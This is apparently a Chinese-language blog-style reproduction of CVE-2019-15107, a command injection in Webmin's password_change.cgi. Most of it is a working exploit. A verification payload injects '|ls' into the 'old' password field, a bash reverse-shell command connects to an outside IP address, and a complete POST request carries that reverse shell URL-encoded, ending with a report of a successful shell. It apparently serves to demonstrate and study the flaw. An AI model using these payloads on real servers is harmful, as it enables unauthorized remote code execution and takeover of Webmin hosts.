漏洞概述
1.漏洞编号:CVE-2019-15107
2.漏洞描述:该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码
该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码
3、受影响的版本:Webmin<=1.920
4,漏洞利用条件:版本满足要求,且服务器的配置文件允许修改密码时,在不知道webmin的用户和密码条件下,可以任意执行代码。
漏洞复现
https://10.95.14.161:26163/
漏洞验证
https://10.95.14.161:62680/password_change.cgi
user=rootxx&pam=&expired=2&old=text|ls&new1=test2&new2=test2
反弹shell
bash -c "bash -i >& /dev/tcp/43.138.56.101/4444 0>&1"
- POST /password_change.cgi HTTP/1.1
- Host: 10.95.14.161:62680
- Cookie: redirect=1; testing=1
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- Accept-Encoding: gzip, deflate
- Upgrade-Insecure-Requests: 1
- Sec-Fetch-Dest: document
- Sec-Fetch-Mode: navigate
- Sec-Fetch-Site: none
- Sec-Fetch-User: ?1
- Te: trailers
- Referer: https://10.95.14.161:62680/session_login.cgi
- Connection: close
- Content-Length: 138
-
- user=rootxx&pam=&expired=2&old=bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F43.138.56.101%2F1099%200%3E%261%22&new1=test2&new2=test2
-
-
反弹shell成功
若有收获,就点个赞吧